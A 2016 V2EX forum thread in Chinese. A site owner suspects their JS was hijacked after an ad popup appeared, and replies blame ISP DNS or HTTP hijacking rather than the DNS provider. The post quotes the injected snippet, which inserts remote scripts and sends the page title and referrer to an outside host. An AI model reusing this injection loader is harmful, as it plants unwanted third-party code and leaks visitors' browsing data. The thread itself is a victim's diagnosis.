网站 JS 被劫持,是 cloudxns 的锅吗?

2016-10-29 10:47:52 +08:00
 honkew

打开网站,右下角弹出了一个广告 第一反应是浏览器广告,按下 F12 ,刷新,发现 js 不对, wtf ? 被黑了吗,看源码没有被修改,那么应该是劫持。 http://p1.bqimg.com/1949/a76f17c2e682a123.png http://p1.bqimg.com/1949/c6afcb938f08c356.png 下面是劫持代码

var a=function(b){var d=document,e=d.createElement('script');e.src=b;var f=d.getElementsByTagName('head'),i=(f&&f.length>=1&&f[0])||d.body;i.insertBefore(e,i.firstChild)};a("http://网址 /ckplayer.js?_veri=20151101");a("http://pj.iaoso.com/lib/query?src=t6413&t="+encodeURIComponent(document.title)+"&r="+encodeURIComponent(document.referrer)+"");

下面是 js 文件测速截图,只发现这个节点大小和别的节点不一样

http://p1.bqimg.com/1949/6a201f0cd17d317c.png

好久不发帖这个编辑器怎么变了

6305 次点击
所在节点    CDN
3 条回复
InFaNg
2016-10-29 18:05:39 +08:00
运营商的锅
CloudXNS
2016-10-31 10:11:49 +08:00
这个锅我不背。
HLT
2016-12-23 20:38:31 +08:00
运营商 DNS 或 HTTP 劫持,跟 cloudxns 没关系

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/316382

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX